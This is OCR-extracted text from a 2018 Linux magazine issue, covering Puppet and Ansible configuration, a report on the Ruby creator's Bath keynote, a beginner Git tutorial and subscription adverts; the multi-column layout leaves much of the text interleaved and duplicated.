you decide to make to its environment. on GitHub: http://bit.ly/lud_puppet. Puppet master and it should connect
Puppet can track the current running state To accomplish the same thing using VMs when you build your VM. A more advanced
example using shell scripts and multiple
folder shares is available at http://bit.ly/
lud_puppetmaster.
To install the Puppet server through the
package manager on natively installed Linux
setups – or your Puppet Master VM if you
chose to use a vanilla Vagrant image – you
will first need to enable the Puppet package
repositories. For Debian-based distros you
can fetch a matching DEB file from https://
apt.puppetlabs.com, while Yum-based
distros need the relevant RPM from https://
yum.puppetlabs.com/puppet5. Once that’s
done installation is as simple as installing
the puppetserver package.
Installing the agent on other servers
follows exactly the same process as
installing the master, but you install puppet
instead of puppetserver. The default
hostname of the Puppet server is puppet
unless you change this manually, so this
Above If the hostname of your Puppet master is ‘puppet’, every agent on the same network or subnet is what you would configure your installed
will detect it automatically on launch and sync the catalogue straight away Puppet agents to look for.

26
It’s also highly recommended that you set
up a good NTP service on your Puppet master
server, because syncing between it and all
servers running the agent requires the use of
time-limited certificates. If the system clocks
are too far out of sync the servers will refuse
to accept any new changes. Finally, you can

Puppet can track


the current running
state of network
services and restart
them as needed
edit any of Puppet master’s core settings Above The Facter utility lists all the built-in variables and settings – ‘facts’ – that the Puppet agent
such as environment name, DNS names, has exposed, so that you can use them with your custom modules and manifests
certificates and the sync interval by editing
/etc/puppetlabs/puppet/puppet.conf Puppet manifests. For this Puppet provides
and then restarting the service. To manually a utility called Facter, and you can see all quick tip
trigger a resync of any of your agents simply the facts it’s aware of by using $ puppet Get modules from Puppet Forge
SSH into the server and run $ puppet facts. You can make use of the values that You can provision and configure standard
agent -t. this command lists in own your Puppet components like package managers,
In the walkthrough below we briefly look manifests, using either of these two syntax web servers, databases and networking
at writing a custom module for use with options: services from https://forge.puppet.com.
Hiera, Puppet’s built-in key/value data Once you’ve hunted down what you need
look-up system which uses ‘facts’ – preset # $fact_name you can install it with:
variables – to describe an environment. # $facts[fact_name]
But before we reach for the PDK (Puppet $ puppet module install
Development Kit) we should check to see if Find out more about Puppet’s built-in mycomponent
there are already facts that we can edit in our variables at http://bit.ly/lud_facts.

how to
Manage environment variables with Hiera

1 2 3 4
Edit hiera.yaml Write a Set common values Verify your facts
This file lists the custom module Head to the data/ After successfully
‘facts’ you want to Create a new module directory in the compiling your module
track. With a config folder of called ‘profile’ and write a test production environment and test class you can verify
/etc/puppetlabs,define class for it, ensuring it uses folder and set your variables your settings with:
searchable folders in puppet/, parameters with memorable in common.yaml. The keys
common variables in code/ names and sensible data types. you define should follow $ puppet lookup
environments/production/ Writing a test manifest is the pattern profile::test_ profile::test_
and package settings in code/ optional, but it can be helpful class::parameter and their class::parameter
environments/production/ when troubleshooting your values should to match the data --environment production
modules/<modulename>. module and key values later. types you set in your module. --explain

www.linuxuser.co.uk 27
Feature Control Containers

Configure Ansible
Manage your applications and configuration with Red Hat’s answer to Puppet

Quick guide
Installing Ansible
The most straightforward way to get
Ansible up and running is by installing
it through through the pip package
manager distributed with Python.
However, you can also install it through
your distro’s package manager.
Above Playbooks are Ansible’s equivalent of Puppet’s Manifests. The decision to use YAML and a Unfortunately the latest version won’t
straightforward task-based structure helps keep the learning curve shallow for devops teams be in the main channels by default,
so there’s a little extra legwork to

P
uppet is far from the only system requires you to download a special SDK and do. RHEL 7 users need to enable the
you can use to centrally manage consult your resident ‘subject matter expert’ Extras repository before Ansible can
the provisioning of applications. on its internal workings. be installed through yum, while older
Ansible prides itself on being easy to learn However, the main downside is there’s no versions will need you to enable EPEL.
and is in many ways a lot simpler to use than central community repository for pre-built Meanwhile, Ubuntu users can install
its rivals. Puppet, for instance, relies on Ansible modules and playbooks to match the the latest package from the project’s
agents that request manifests and poll for equivalents for Docker, Vagrant and Puppet. PPA; just run the following command to
changes before they can edit files and run As a result you may have to scour GitHub add that:
custom tasks. Ansible, on the other hand, for helpful module code. Thankfully, in the
doesn’t require any agents, instead reading case of playbooks the situation is helped $ sudo apt-add-repository
plain English definitions of tasks you want to significantly by the comprehensive project ppa:ansible/ansible
perform on-the-fly from a YAML file, known documentation and a community of bloggers.
as a playbook. As mentioned Ansible’s playbooks are
Ansible itself is also built on Python rather defined in YAML, and each ‘play’ in that file controlling how to respond if services go
than Ruby, so you may find that writing follows a consistent pattern. First, you define down or certain files change. You can also
custom modules yourself has a shallower the hosts (servers) that the play will apply configure them to listen for other tasks being
learning curve than Puppet, which often to, and which users Ansible should run as run and send notifications or log messages
on those machines. You would use the ‘root’ wherever they’re needed. Execute it with:
remote user to install packages and edit
quick tip sensitive files, but if you’ve disabled root $ ansible-playbook myplaybook.yml
Taking things a step further logins over SSH you can elevate yourself in -f 10
You will find more documentation for the next stage.
Ansible Core and Ansible Tower (the That next stage is where you define your If your playbook is tracked in a git repository
enterprise version that provides a pretty tasks. Typically you will want to set a name you can also clone and run that YAML file with:
web GUI) at https://docs.ansible.com. for each of them, for logging purposes, and
This covers setup steps, playbooks and then tie each to a service or command. You $ ansible-pull -U [email protected]
modules for every supported version in can also use a template file to overwrite myplaybook.yml
much greater detail than we’re able to fit existing configuration files on those
in this, already packed, feature. destination servers. Finally, you set up your That’s enough to get you started. Now,
handlers, which tell the machines you’re it’s time to dive in yourself!

28
ON SALE NOW!

Available at WHSmith, myfavouritemagazines.co.uk


or simply search for ‘T3’ in your device’s App Store

SUBSCRIBE TODAY AND SAVE!


www.myfavouritemagazines.co.uk/T3
Subscribe Never miss an issue

get your free gift!

& get 6 free cabledrops


CableDrops put an end to the insanity of fumbling with cables all the time. You
can affix CableDrops to desks, walls and nightstands, so you’ll never have to dive
behind or under your workspace to find a cable again. CableDrops keep all your
leads in place so they are there when you need them – and you get a pack of six
FREE if you subscribe today!

free
gift!
Simply stick
CableDrops
anywhere you
need them

30
Only
DE

DIsTros & foss


plvUAETA

£32
Install today!
usn 2
b

ubuntu Mate 18.04 (beta 2)


Sample a modern take on the

ubuntu Mate
traditional desktop metaphor
ContaIners
.0

today! Built on the solid


foundations of the latest ubuntu
18.04 ltS, this benefits from
february’s new release of Mate
1.20 which now has Hidpi support
for crisper, more detailed images.
MX linux 17.1 all the tutorial code
a middleweight distro using if you dived straight into our control
a custom Xfce desktop which containers feature (on p18), you’ll
packs an excellent selection of want to grab our example scripts,
administrative utilities into its dockerfiles, ansible playbook
MX tools dashboard. samples and puppet manifests. in
computer Security this issue, we
devuan 2.0 asCII (beta) look at privilege escalation, which
an incredibly solid beta of the is something of an art – and we’ve
next edition of devuan, the distro included a few tools of the trade,
without systemd. comes with a including Vulners Scanner for
new login and device file manager. sniffing out vulnerable packages. beta 2

for a six-month
+ all tutorial code All the power of Ubuntu + MATE’s traditional
Disclaimer
In no event will Future Publishing Limited
Contact
Future Publishing
Please note
This DVD autoboots to a menu,
desktop experience + enhanced HiDPI support

subscription
accept liability or be held responsible for any Quay House so simply insert the disc and

plus powerful new oS


damage, disruption and/or loss to data or
The Ambury reboot your PC. Please ensure
systems as a result of using this disc. Future
Publishing Limited makes every effort to ensure
Bath your DVD drive is set to boot
that this disc is delivered to you free from BANES, BA1 1UA before your hard drive. Consult

MX lInuX 17.1
viruses and spyware. We do still recommend % +44 (0)1225 442244 your PC manufacturer’s
that you run a virus checker over this disc Website: www.linuxuser.co.uk instructions. Thanks for
before use. Future Publishing Limited cannot Subscriptions supporting Future Publishing.
guarantee that at the time of use, hyperlinks Subscribe to Linux User & Developer today! 2018 Future Publishing Ltd.
direct to that same intended content, as Future
Publishing has no control over the content % UK 0844 249 0282
free with
delivered by these hyperlinks. Unless otherwise Overseas +44 1795 419161
issue 191
Email: [email protected]
stated, all software on this disc is distributed
in accordance with the GNU General Public 6-issue subscription (UK) – £32 a fast, friendly and stable linux distribution
13-issue subscription (Europe) – €88
License. For more information on the GNU GPL
loaded with an exceptional bundle of tools
THE MAgAzInE for
THE Gnu GeneratIon

please visit www.gnu.org/licenses/gpl-3.0.txt.


LUD191.dvd_wallet.indd 1 13-issue subscription (World) – $112 06/04/2018 09:57

MX lInuX 17.1
LUD191.dvd_wallet.indd 1
please visit www.gnu.org/licenses/gpl-3.0.txt.
License. For more information on the GNU GPL
13-issue subscription (World) – $112
13-issue subscription (Europe) – €88
loaded with an exceptional bundle of tools 06/04/2018 09:57

a fast, friendly and stable linux distribution


THE Gnu GeneratIon

6-issue subscription (UK) – £32


THE MAgAzInE for
in accordance with the GNU General Public
stated, all software on this disc is distributed Email: [email protected]

more Reasons to subscribe


delivered by these hyperlinks. Unless otherwise issue 191
Overseas +44 1795 419161
Publishing has no control over the content
direct to that same intended content, as Future
% UK 0844 249 0282
free with

guarantee that at the time of use, hyperlinks Subscribe to Linux User & Developer today! 2018 Future Publishing Ltd.
before use. Future Publishing Limited cannot Subscriptions supporting Future Publishing.
that you run a virus checker over this disc Website: www.linuxuser.co.uk instructions. Thanks for

plus powerful new oS


viruses and spyware. We do still recommend % +44 (0)1225 442244 your PC manufacturer’s
that this disc is delivered to you free from BANES, BA1 1UA before your hard drive. Consult
Publishing Limited makes every effort to ensure
Bath your DVD drive is set to boot
systems as a result of using this disc. Future
damage, disruption and/or loss to data or
The Ambury reboot your PC. Please ensure
accept liability or be held responsible for any Quay House so simply insert the disc and
Future Publishing This DVD autoboots to a menu,
In no event will Future Publishing Limited
Disclaimer Contact Please note desktop experience + enhanced HiDPI support
+ all tutorial code All the power of Ubuntu + MATE’s traditional
new login and device file manager. sniffing out vulnerable packages. beta 2

Never miss an issue Delivered to your home Get the biggest savings
without systemd. comes with a including Vulners Scanner for
next edition of devuan, the distro included a few tools of the trade,
an incredibly solid beta of the is something of an art – and we’ve
devuan 2.0 asCII (beta) look at privilege escalation, which
computer Security this issue, we
MX tools dashboard. samples and puppet manifests. in
administrative utilities into its dockerfiles, ansible playbook
packs an excellent selection of want to grab our example scripts,
a custom Xfce desktop which

ubuntu Mate
containers feature (on p18), you’ll
a middleweight distro using

13 issues a year, and you’ll be Free delivery of every issue, Get your favourite magazine
if you dived straight into our control
MX linux 17.1 all the tutorial code
for crisper, more detailed images.
1.20 which now has Hidpi support
february’s new release of Mate
18.04 ltS, this benefits from
ContaIners
sure to get every single one direct to your doorstep for less by ordering direct
foundations of the latest ubuntu
today! Built on the solid
traditional desktop metaphor
0.

Install today!
Sample a modern take on the
2

ubuntu Mate 18.04 (beta 2)


AT AU
n

DIsTros & foss


Eb v

su
lp
D E

order online & save


www.myfavouritemagazines.co.uk/ludg18
OR CALL 0344 848 2852
quote code LUDG18 when calling
*Terms and conditions: Please use the full web address to claim your free gift. Gift available to new print subscriptions. Gift is only available for new UK subscribers. Gift is subject to availability. Please allow up to 60 days for the
delivery of your gift. In the event of stocks being exhausted we reserve the right to replace with items of similar value. Prices and savings quoted are compared to buying full-priced print issues. You will receive 13 issues in a year.
Your subscription is for the minimum term specified and will expire at the end of the current term. You can write to us or call us to cancel your subscription within 14 days of purchase. Payment is non-refundable after the 14-day
cancellation period unless exceptional circumstances apply. Your statutory rights are not affected. Prices correct at point of print and subject to change. UK calls cost the same as other standard fixed-line numbers (starting 01 or
02) or are included as part of any inclusive or free minutes allowances (if offered by your phone tariff). For full terms and conditions please visit www.bit.ly/magterms. Offer ends 31 May 2018.

www.linuxuser.co.uk 31
Feature Special Report: Ruby

RUby is
alive
& well

Dan Bartlett
The creator of Ruby, declares “We will do everything to
survive” in his first UK keynote speech in five years.
Chris Thornett reports from the Bath event


How is software born?” It’s an unusual first followers. Its syntax, for instance, is very readable but
question from the genial Japanese creator expressive in a terse way, and as a dynamic, reflective,
of the Ruby programming language, object-oriented, general-purpose programming
KEY INFO Yukihiro ‘Matz’ Matsumoto. He’s making his language it’s intuitive and easy to learn. Ruby tries not
The annual Bath first keynote speech in the UK in five years to over 500 to restrict those who use it, or as Matz is often quoted,
Ruby conference Ruby developers at the annual two-day Bath Ruby “Ruby is designed to make programmers happy.”
is the biggest Ruby Conference. Ruby celebrated its 25th year in February But not everyone is happy. The popularity of the
developer event in although officially its first release, 0.95, was in language has been bolstered for many years by the
the UK and takes December 1995, so in answer to his own philosophical dominance of the Ruby on Rails (RoR) web application
place over two question, Matz suggests that software is born when it framework, particularly among startups who wanted
days, with a mix of is named. It’s the kind of poetic answer you expect from something to deal with much of the heavy lifting. That
technical and non- the creator of such an expressive language and means popularity saw the Ruby language soar to fifth place in
technical speakers Ruby was ‘born’, at least for Matz, two years earlier on the RedMonk Language Rankings in 2012, and rank in
plus workshops (not 24 February 1993 – hence the big celebration in Tokyo the top 10 in other indexes.
to mention karaoke). earlier this year and across social media. Talking of the Since then, Ruby has drifted down to eighth. RoR,
https://bathruby.uk language’s origins, Matz says he wanted to name it although popular, isn’t the superstar it once was
after a jewel: “Ruby was short, Ruby was beautiful and and has faced fierce competition as issues such
more expensive, so I named my language Ruby,” he as scaling have become a greater concern for older
says, joking with his community. web companies. Although not directly comparable
However, Matz isn’t in the UK for the first time in five and with its own limitations, the JavaScript run-time
years just to eat birthday cake. Ruby may have reached environment Node.js, for example, has become popular
maturity, but there are still questions over whether for its runtime speed at scale, ease of adoption for
it can survive another 25 years. Like its creator, the back-end use by front-end JavaScript users, and
Ruby language is very likable and garners passionate its single-threaded approach to handling multiple

32
connections, among other things (although that does
make it less suitable for CPU-intensive tasks such as spotlight
image processing). Sharing recipes with Ruby
It’s clear Matz is aware that the adoption of any
programming language is stimulated by the projects and
frameworks that grow from a language’s community and
ecosystem – and RoR is an astonishing example of that.
So while he was keen to use his keynote to express his
regret for past mistakes he’d made in the language, he
also wanted to define a path to address the performance
and scaling issues.
Matz focused on two key trends: scalability, and what
he calls the “smarter companion”. To combat scalability
and create greater productivity, Matz believes that
“faster execution, less code, smaller team [are] the keys
for the productivity.” Computers are getting faster, he Above Cookpad’s CTO Miles Woodroffe: “You stumble upon
told the packed hall, but it’s not enough: “We need faster little tiny improvements to the language in every release,
execution because we need to process more data and so it’s a really fun language to work with”
more traffic. We’re reaching the limit of the performance
of the cores. That’s why Ruby 3.0 has a goal of being three Cookpad (https://cookpad.com/uk), the main
times faster than Ruby 2.0” – or, as he puts it, “Ruby3x3”. sponsor of the Bath Ruby conference, is a classic
example of a web company that relies heavily on
Ruby and Ruby on Rails. It’s a recipe-sharing site,
More code is more and while CTO Miles Woodroffe says the site has
over 60 million users a month in Japan, it’s also
maintenance, more expanding globally, having moved its international
HQ to Bristol. “We’re really invested in Ruby
debugging, more time, as a platform,” Woodroffe told us. “A lot of our
infrastructure is powered by Ruby scripting –
less productivity Ruby for everything pretty much.”
As well as having 100 Ruby engineers dotted
around the world, Cookpad employs two core
“This is easy to say,” Matz acknowledges, adding that Ruby team members full-time. One of them
in the days of 1.8, Ruby was “too slow” and a mistake. is Koichi ‘ko1’ Sasada, creator of YARV – the
Koichi ‘ko1’ Sasada’s work on YARV (Yet another Ruby VM) official interpreter for Ruby since 1.9. Sasada
improved performance for Ruby 1.9, and “since then,” is now working on concurrency (Project Guild)
says Matz, “we have been working hard to improve the and it’s another way Woodroffe expects to see
performance of the virtual machine, but it’s not enough.” performance gains. Ruby 3, however, is the game
changer: “It’s quite a huge paradigm shift in how
Time for JIT Ruby is built and interpreted,” says Woodroffe.
To improve performance further Ruby is introducing JIT “So if we get this three times performance for
(Just-In-Time), a technology already used by JVM and everyone [...] less resources will be needed to do
other languages. “So we’ve created a prototype of this the same thing and probably save us money.”
JIT compiler so that this year, probably on Christmas Day,
Ruby 2.6 will be released,” Matz confirms. You can try
the initial implementation of the MJIT compiler in the 2.6 library file. The RubyVM can then use that cached,
preview1 (http://bit.ly/Ruby2-6-0-preview1). Currently, precompiled native code from the dynamic library the
you can check and compile Ruby programs into native next time the RubyVM sees that same YARV instruction.”
code with the --jit option. Matz says it’s “not optimised” Scalability, Matz also believes, should mean creating
although for “at least CPU intensive work it runs two less code, as “more code is more maintenance, more
times faster than Ruby 2.0,” which he feels “offers a lot debugging, more time, less productivity,” and, he joked,
of room to improve performance of the JIT compiler”. “more nightmare.” Less Ruby code isn’t going to mean
For CPU-intensive tasks, in particular, Matz sounds significant changes to the language’s syntax, however,
confident that they would be able to accomplish the x3 largely because there’s little room for change: “We have
performance improvement. run out of characters. Almost all of them are used,” says
Probably the clearest overview explanation of how Matz. Being an exponent of egoless development, he’s
MJIT works is supplied by Shannon Skipper (http:// also not prepared to change the syntax for the sake of
bit.ly/RubysNewJIT): “With MJIT, certain Ruby YARV his pride and see existing Ruby programs broken, so he
instructions are converted to C code and put into a .c file, was careful to say that they weren’t going to change Ruby
which is compiled by GCC or Clang into a .so dynamic syntax that much.
Feature Ruby

Process, Matz says, should be dealt with by smaller


teams as well, to handle scalability and increase spotlight
productivity: “If your team is bigger than the fact they Polishing Ruby
can eat two pizzas,” quoting CEO of Amazon Jeff Bezos’
Two-Pizza Rule, “then your team is too big.” Frankly, that Contributing to a programming language isn’t
may depend on who is on your team and how much they something you can just drop into; it involves quite a
like pizza, but the idea, Matz says, is based on personal steep learning curve. Ruby’s answer is to run Hack
experience: “If your team is bigger then you need more Challenges. These are an opportunity for aspiring
communication and communication itself is the cost.” Ruby committers to test their mettle and learn how
to extend Ruby features, fix bugs and improve the
More abstraction overall performance of the language. Up until very
There have been quite heated debates in recent years recently such challenges only ever took place in
about the need for more Ruby abstractions that provide Japan, but in an effort to draw in new contributors
services for developers to build applications suited from the global community, in March Matz – along
to different fields such as science, and it’s something with core Ruby committers, Koichi ‘ko1’ Sasada and
Yusuke ‘Mame’ Endoh – headed to Cookpad’s new
international UK HQ in Bristol to run a challenge.
One thing I regret in the Leading developers were invited from across
the world – Paris, Cape Town, Sao Paulo and San
design of Ruby is thread… Francisco – and tasked with hacking the Ruby
Interpreter. According to Cookpad CTO Miles
it is too primitive Woodroffe, Matz was impressed by the high
standard of the engineers. “My dream will be if we
get five people from that who, over the next year or
Matz hears loud and clear. Using Ruby on Rails’ Model- two, start contributing,” he says.
View-Controller (MVC) abstraction as an example, he
acknowledged they needed more, and while not perfect
he says “they provide the kind of abstraction that is vital
for productivity in the future.”
One key abstraction he elaborated on was a concurrent
project called Guild. “One thing I regret in the design of
Ruby was thread… it is too primitive,” Matz admits. But
Ruby is a victim of its own success; the language is used
by so many people, Matz feels it’s too late to remove
thread. “I think it’s okay to include a new abstraction,”
he ventures, “and discourage the use of thread” in the
future. “Guild is Ruby’s experiment to provide a better Above Ruby developers were flown in from across the
approach. Guild is totally isolated,” Matz explains. globe for the first Ruby Hack Challenge outside of Japan
“Basically we do not have a shared state between

Guilds. That means that we don’t have to worry about


quick guide state-sharing, so we don’t have to care about the locks
RedMonk Language Rankings Sep 2012-Jan 2018 or mutual exclusives. Between Guilds we communicate
with a channel or queue.” Matz expects to ship Guild’s
javascript 1 javascript concurrent abstraction in Ruby 2.7 or 2.8.
Another codenamed project that Ruby has in the works
JAVA 2 JAVA
is Steep. This is an attempt at static-type analysis for
PHP 3 PYTHON
Ruby: “It’s difficult to analyse the Ruby type information,
Language Rank

PYTHON 4 PHP because Ruby is a dynamically typed language, so you


RUBY 5 C# can do anything with all types,” says Matz. Some subsets
of Ruby can be statically typed, and Matz says they can
C# 6 C++
add those static-type checks, which are “kind of like a
C++ 7 CSS TypeScript user-defined type information. We’re going
C 8 RUBY to infer as much as possible and we’re trying to get the
OBJECTIVE-C 9 C
information from those external type-defined files or
from the runtime profile type analysis…”
SHELL 10 OBJECTIVE-C
Using this analysis, Matz suggests, developers will be
able to detect more errors, “We’re not going to implement
2013 2014 2015 2016 2017 2018 100 per cent detection safety, it’s not possible for Ruby,
Above Ruby’s rating in terms of developers’ favourite languages has dropped dramatically but we can detect 20-40 per cent of errors,” he says.

34
Q&A
Creator of Ruby,
Yukihiro ‘Matz’ Matsumoto
What is it about programming
languages that fascinate you?
The programming language is the way to express
what you want a computer to do in a way that
both we humans and computers can understand.
It’s kind of a compromise. But at the same time
it is the programming language that is the way
to express your thoughts in a clear manner so
Above The first Ruby Hack Challenge outside of Japan reflects a that it is also a tool to express your ideas. Think
drive to see more contributors from the global Ruby community about that – you can write down your software
on a sheet of paper, so it doesn’t execute on the
Matsumoto also touched on Ruby becoming a “smarter computer simply because it can’t see the paper,
companion” as well as the programmer’s best friend. but it is still a program and it will still help you
“We [are] now at the beginning of smarter computers, so, understand what you want to do.
for instance, RuboCop [static code analyser] is one way Programming languages have different ways
of helping you.” Matz also suggested that in the future, to express ideas, how to organise the software
when you compile a program “Ruby could suggest [for structure or maybe providing some kind of
example] ‘You called this method with an argument string abstraction. It’s that part, it’s that psychological
but [did] you expect to call this method with integer?’”. aspect of the language that’s motivated me to
After his keynote, Matz described this programming work on it for the last 25 years.
interactivity to be something like Tony Stark’s Jarvis.
Essentially, he wants to see “an AI that will interact with Have you always been a fan of open source
me to organise better software.” software? Was that always your intention when
creating Ruby?
Actually, when I was school I studied
We will have it so that programming a lot from reading the source code
from free software, like [GNU] Emacs and other
every Ruby 2 program free software tools, so it was so natural for me
to make my software free or open source, unless
will run in Ruby 3 I have some constraint like the software was
owned by the company or something like that. But
Ruby was originally my hobby project.
Change brings with it the possibility of software that no
longer works as intended, or indeed at all. It’s a concern Have you encountered people who are afraid
that haunts Matz from past mistakes: “In the past we of the changes to Ruby?
made a big gap, for example between 1.8 and 1.9,” he We made several mistakes designing the
says. “We made a big gap and introduced many breaking language, but if we fix them in the future that
changes, so that our community was divided into two for would break so much code, so we’ve given up that
five years.” Matz sees this as a tragedy: “We’re not going kind of fix. Fixing the issues would satisfy us and
to make that mistake again so we will do a continuous our self-esteem, but it is not worth it to harm the
evolution. We’re going to add the JIT compiler to 2.6 and big codebase. For example, if I make this small
not wait until Ruby 3.0, were going to add some type of breaking change that would affect 5 per cent of
concurrent abstraction in the future in Ruby 2.7 to 2.8, the users that could improve performance by a
but it will not be a breaking change. We will have it so that factor of two, I would like to do that... but I’m not
every Ruby 2 program will run in Ruby 3.” going to do a change for my sense of self-esteem.
Reversing Ruby’s current slow trajectory downwards is
not going to be an easy task and Matz seems to realise How do you feel about people who say Ruby is
this: “Ten years ago Ruby was really hot, because of Rails. dead – does it bother you much?
These days Ruby isn’t considered hot, but it is stable.” [Laughs] Yeah, I don’t mind criticism. If someone
Indeed, Ruby has crossed that gap into maturity and has some bad thing about the language they
Matz has no intention of giving up on it any time soon: just leave without saying anything. But having
“Ruby is a good language to help you become productive criticism is an indication that we have something
and I want Ruby to be like that for forever, if possible. to improve. I welcome that kind of criticism so we
That means we have to evolve continuously forever, so we can take it constructively.
can’t stop; we can’t stop.”
Tutorial Essential Linux: Git

part one

Git: Learn version control


with our simple Git project
Get started using Git, the powerful and popular version-
John
Gowers control system written for Linux kernel development
It can be difficult to manage a large software project software, but also for your own smaller projects. We’ll
John is a with lots of different contributors. You need to be able use GitHub (www.github.com) to host our projects. Git
university tutor to keep track of all the changes as they come in so is not tied to GitHub in any way; however, this website is
in Programming that you can revert them, build on them or deal with the most commonly used repository of Git projects. If you
and Computer conflicts between them as necessary. The tools that we haven’t already got a GitHub account, create one now.
Science. He likes use for this are called version-control systems; there are
to install Linux many different systems available, but our favourite is Git. Our first project
on every device Git was developed by Linus Torvalds, the creator of Git is most commonly used as a version-control system
he can get his the Linux kernel, because none of the other version- for source code and other parts of computer programs.
hands on, and control systems at the time were suitable for the large However, we’d like to make this tutorial as language-
uses terminal software project he was working on – that is, Linux agnostic as possible, so in our example we’re going to
commands and itself. Since then, Git has been a huge success. In imagine another situation in which we might want to use
shell scripts on the 2015 Stack Overflow Developer Survey, it was the a version-control system: managing a collaboratively
a daily basis. preferred version-control system of 69.3 per cent of written novel.
respondents. Its companion site, GitHub, is used by 24 Our good friend Jane has recently completed a draft
Resources million people across 200 countries. Moreover, because of a novel called Emma, and she’s been in touch to ask
of its connection with Linux, it’s used particularly often if we want to collaborate with her in order to make some
Git for version control in the Linux community and for open improvements to the novel. The only snag is that Jane is
If not already source software projects. from the 18th century, and knows nothing about version-
installed, install With all that in mind it’s very useful to know how to use control software, so she’s asked us to take care of that
through your Git – not only if you plan to contribute to a large piece of aspect of things.
package manager
or from https://git-
scm.com

Wget
Install through your
package manager
or from www.gnu.
org/software/wget

Above GitHub provides a user-friendly way to host and browse through Git projects

36
The first step is to create a new repository, which we
Figure 1
will do on the GitHub website. Navigate to the home page
at https://github.com and click the button that says
‘Start a project’. A page will appear asking for a project
name and some other information. Since GitHub projects
need to have unique names, we cannot suggest a
particular name for you to use, so you’ll need to come up
with your own name for the project; try to include ‘Emma’
somewhere in order to make it clear what the project is
about. If you like, write a description of the project.
Tick the box that says ‘Initialize this repository
with a README’. This will create a README file inside
the repository that we can use to record important
information about the project. More importantly, creating
this file will initialise the repository so that we can start
working with it on our computer.
Click ‘Create repository’ in order to create the
repository; we arrive at the home page for our new
repository. The GitHub website enables us to make lots it means that if two people are working on a file at the Above GitHub makes
of changes online, but from now on we’ll stick to using Git same time, we have a chance to reconcile the changes. it very easy to copy the
from the command line. It’s time to initialise the repository by adding some link that enables us to
files. In order to download Jane’s novel, run the following: unlock the power of Git
at the command line
Git is not tied to GitHub $ wget www.gutenberg.org/files/158/158-0.txt
-O novel.txt
in any way; however, $ sed -i -e 's/\r//' novel.txt

this website is the most We now have a file, novel.txt, that contains the text of
the novel. The second command converts the text file Readme
commonly used repository newlines from DOS to UNIX format. It’s traditional to
Before we do anything else, let’s push this new file to initialise a GitHub
of Git projects the online repository. When we do this, it’s a good idea repository with
to check the status of our local branch by running the a file, README.
following command: md, that contains
The last thing we need to do is to click the green button information
marked ‘Clone or download’ and copy the URL that $ git status about the project
appears, as shown in Figure 1. This is the location of our such as its name,
repository online, and we will need it in order to clone the We should see the following output: a description
repository to our computer. and possible
On branch master installation
Clone and start the repository Your branch is up-to-date with 'origin/ and running
Open a command window, and navigate to the location master'. information.
where you want to clone the repository. It’s a good idea to Untracked files: Unlike a normal
create a new directory to hold all your Git projects. Once (use "git add <file>..." to include in text README,
inside that directory, type git clone and then paste in what will be committed) the file README.
the URL that you copied and press enter. For example: md supports
novel.txt Markdown
$ git clone https://github.com/My_Name/ formatting, so
collaborative-emma-novel.git This tells us that the new file, novel.txt, is not yet being we can make
tracked by Git. We remedy this situation by running the headings using
This will create a new directory with the same name as following command: # Heading,
the project. Navigate into it with cd. The directory we have bold text using
created is a local copy of the project living at GitHub. $ git add novel.txt **bold** and
com. At the moment, it appears to contain nothing but italics using
the README file, but if we run the command ls -a, we see If we run git status again, then we see that novel.txt *italics. This
that it also contains a directory called .git. This directory is now marked as a ‘new file’. formatted text
contains all the information about the project that Git The next step is to commit our changes. Committing is is what appears
needs to run – make sure you don’t delete it! When we something that we do periodically whenever we’ve made on the project’s
make changes in the local branch, they will not be pushed a fairly substantial number of changes. We cannot push home page.
to the server immediately. This is a good thing, because any modifications we have made to the online repository

www.linuxuser.co.uk 37
Tutorial Essential Linux: Git

before we have committed them, but we might want to $ git commit -a -m "Changed Emma’s age to
Gists commit multiple times before we push changes online. 17."
One thing you Committing requires us to add a message detailing what
might come the changes are, so it’s a good idea to commit at any The -a flag to git commit tells it to add all new changes
across if you point that we’ve made enough changes to warrant writing to the current commit. This saves us having to run git
use GitHub a such a message. add before running git commit as we did before. We can
lot are gists, This time, run the command: then run git push -u origin master again to push
normally hosted the changes online.
at gist.github. $ git commit -m 'Added the original text of The second author has decided to make some more
com. A gist is the novel.' drastic changes to the first paragraph. Inside the second
a particular local copy of the repository, open the file novel.txt and
type of GitHub to commit our most recent changes. If we run git replace the first paragraph with the following:
repository, status now, we see that novel.txt is no longer marked
normally as a new file, because it is part of the current commit. So okay, you’re probably thinking, “Whatever,
intended for However, we now get a message saying that we are ahead is this like a Noxema ad?” But I actually
sharing small of 'origin/master' by one commit. This is because have a bare normal life for a teenage girl.
snippets of we have performed a commit on the local branch, but
code with other have not yet pushed it to the server. Run git commit -a -m 'Changed the first
people, or Before we push any changes to the server, it’s a good paragraph.' in order to commit these changes.
storing them idea to run the following command: Before we try and push them to GitHub.com, let’s run
for your own the command git pull to fetch any new changes from
use. The benefit $ git pull the repository. When we run this command, we get the
of using a gist following error.
rather than a This command will fetch or ‘pull’ any changes that have
normal file- been made to the online branch. Had someone else CONFLICT (content): Merge conflicts in
storage service modified the online repository, we would want to fetch novel.txt
such as Pastebin their changes so that we could deal with any possible Automatic merge failed; fix conflicts and
is that, since a conflicts before pushing our version. In this case, since then commit the result.
gist is really a no one else is working on the repository, we should get
Git repository, the message Already up-to-date. We’re getting this message because our current commit
GitHub stores We can then run the following command to push our contains modifications that cannot be reconciled with
the full version changes to GitHub.com: the modifications that have been made to the master
history of code. branch since we last pulled the code from it. To get a
$ git push -u origin master better idea of what’s going on, let’s open the file novel.
txt in a text editor. When we open it and move to line
We’re prompted for our GitHub username and password; 48, we discover that Git has changed the file so that it
after we’ve given these, Git sends the new file. We can now displays the conflicts in such a way that we can
reload the page for our repository on GitHub.com and choose ourselves how to resolve them. Figure 2 shows
we should see that the new file novel.txt now appears the relevant part of the code. Wherever it finds a conflict
there alongside the README. between the two versions, Git has put

Managing merge conflicts <<<<<<< HEAD


A great strength of Git is that it allows us to deal with
merge conflicts: situations in which two people have followed by the text as it is in the current repository,
made changes to a file that clash with one another. followed by =======, followed by the text as it is on
To demonstrate this, navigate to a new directory – GitHub, followed by >>>>>>> and a hash code indicating
somewhere other than where you cloned the repository the particular commit that is online.
the first time – and re-run the git clone command It’s now up to the individual collaborator to decide how
that we used before. You might have to copy the Git URL
again. This will create a new local copy of the repository,
allowing us to simulate a merge conflict caused by two
separate authors making incompatible changes.
The first author has decided that the book needs to be
made more teenager-friendly by changing the age of the
